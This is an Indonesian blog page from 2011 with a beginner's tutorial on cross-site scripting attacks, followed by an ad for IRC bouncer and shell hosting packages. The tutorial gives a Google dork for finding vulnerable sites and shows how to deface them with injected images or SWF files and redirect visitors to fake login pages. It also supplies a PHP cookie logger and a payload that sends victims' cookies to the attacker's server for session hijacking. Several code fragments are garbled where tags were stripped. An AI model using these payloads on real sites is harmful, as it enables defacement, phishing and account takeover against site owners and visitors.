.:: SELAMAT DATANG DI WWW.E-DUKASINET.TK / KITA BERAWAL DARI DUNIA MAYA. TAPI SUATU SAAT BAKAL JADI NYATA, DAN KENYATAAN ITU AKAN JADI SODARA AMIEN 3 X ::.

Pengeluaran  Togel 2012

Kamis, 22 September 2011

XSS Attack Untuk Pemula

Banyaknya temen2 yang pernah nanya ama gw tentang apa itu XSS dan seberapa bahayakah Xss itu, maka gw berkeinginan membagikan sedikit yang gw punya. mungkin ne sekedar tutor cupu dari seorang new bee kaya gua ne.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.



Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menyuruh kacung paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.
Betul, kita menggunakan Dork dengan query sebagai berikut:

" inurl:"search.php?q=" "


atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum.

Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :


" alert("XSS") "


maka jika menampilkan dialog box seperti ini maka site itu vulner :





tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut
:



tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut :

" "

nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh.
" http://www.Target.ac.id/search/?q="


kemudian apa yang terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi.
misalnya contoh gini:




metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri

"





dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :


" window.open( "http://www.google.com/" ) "

maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.

Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Atau salin aja code dibawah ini :



$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>



Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini

" window.location = "http://server-lu.com/cookielogger.php?c="+document.cookie "

atau

" document.location = "http://Server-lu.com/cookielogger.php?c="+document.cookie "


hingga otomatis url pada site berubah menjadi

" http://Target.com/search.php?q=document.location = "http://server-lu.com/cookielogger.php?c="+document.cookie "

Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :


" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Sep 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Sep 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Sep 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Sep 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:25 sess_a4cdcxxxxxxx065ede6ecb062d443f86 "


Nah sekian tutor pendeknya, semoga aja berguna n keep posting and share you knowledge.



MENU MIRC

BUAT PARA CHATER INDONESIA MAUPUN DUNIA SAYA MENJUAL SEBAGAI BERIKUT MENU MASAKAN MIRC HEHEHE..!!!

yang berminat bisa hubungi saya nick B-GUN atau nick Black_Laros Chanel #SMART atau SNOW . Server irc.allnetwork.org port 6667 .!!!!!  Saya udah vakum sebenarnya di MIRC ...!!! tapi bagimana lagi tugas dari teman2 hehehehe ...!!! maaf saya curhat ...!!! langsung aja ea gan ini menu nya di gosok gosok dah ...!!! langsung aja IM admin  Yahoo Messenger juga bisa ...


A paket psybnc
------------

bnc A [Rp 35.000 / $3]
aktif selama 3 bulan
bnc 1 admin 4 user total 5 bouncer

bnc B [Rp 50.000 / $5]
aktif selama 6 bulan
bnc 1 admin 4 user total 5 bouncer


Paket shell
-----------

Shell A
aktif 1 bulan
1 BG = Rp 10.000
Free help support

Shell B
aktif 3 bulan
2 BG = Rp 30.000
Free help support

shell C
aktif 6 bulan
2 BG = Rp 50.000
Free help support

***Penambahan 1 BG = Rp 10.000
***Untuk  bouncer,1BG utk IRC max 1 admin & 2 user, total 3 bouncer
***Untuk eggdrop 1BG = 1 bot, tcl wajar & legal

Paket radio shoutcast
---------------------

Shoutcast A
Aktif 3 bulan
max pendengar radio 32 orang
Rp 30.000
Free installation
Free help support

Paket eggdrop
-------------

Eggdrop A
3 Bot - unlimited tcl
Aktif 3 bulan [Rp 40.000]
Free installation

Eggdrop B
3 bot - unlimited tcl
Aktif 6 bulan [Rp 50.000]
free installation
Media Promosi Iklan PPC Indonesia

You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "